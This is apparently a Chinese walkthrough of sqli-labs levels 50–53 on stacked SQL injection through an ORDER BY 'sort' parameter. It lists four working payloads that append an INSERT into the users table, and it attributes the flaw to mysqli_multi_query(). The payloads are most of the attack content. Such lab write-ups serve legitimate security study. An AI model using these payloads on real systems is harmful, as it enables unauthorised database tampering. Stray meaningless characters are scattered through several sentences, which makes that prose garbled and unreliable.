Less 50
基于錯誤_GET_數(shù)字型_排序堆疊注入
Page 3 的關(guān)卡組成如下:
Less 38 - Less 41:GET 型堆疊注入
Less 42 - Less 45:POST 型堆疊注入
Less 46 - Less 49:排序注入
Less 50 - Less 53:排序堆疊注入
我們從源碼可以看到带斑,一般后臺查詢數(shù)據(jù)庫使用的語句都是mysql_query()
,而可以堆疊注入的后臺使用的是mysqli_multi_query()
都办。
上文排序注入的方法在這關(guān)基本同樣適用匆背,但是基于報錯注入在未注釋 MySQL 報錯信息的時候并不會報錯惶看,而返回一個空表:
其他排序注入方法參考 Less 46。
同理,上文堆疊注入的方法也同樣適用:
?sort=1;insert into users(id,username,password) values(50,'Less50','Less50')--+
堆疊注入的原理參考 Less 38头镊。
Less 51
基于錯誤_GET_字符型_單引號_排序堆疊注入
?sort=1';insert into users(id,username,password) values(51,'Less51','Less51')--+
Less 52
基于Bool_GET_數(shù)字型_盲注_堆疊注入
?sort=1;insert into users(id,username,password) values(52,'Less52','Less52')--+
Less 53
基于Bool_GET_單引號_字符型_盲注_堆疊注入
?sort=1';insert into users(id,username,password) values(53,'Less53','Less53')--+